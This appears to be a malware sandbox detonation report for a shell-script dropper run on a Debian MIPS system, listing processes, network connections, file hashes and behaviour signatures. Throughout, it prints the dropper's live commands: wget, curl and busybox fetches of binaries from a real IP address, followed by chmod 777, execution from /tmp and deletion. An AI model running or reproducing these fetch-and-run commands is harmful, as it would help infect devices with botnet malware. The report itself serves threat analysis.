[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 01:33

Reported

2024-11-14 01:36

Platform

debian9-mipsel-20240729-en

Max time kernel

76s

Max time network

78s

Command Line

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A

Processes

/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

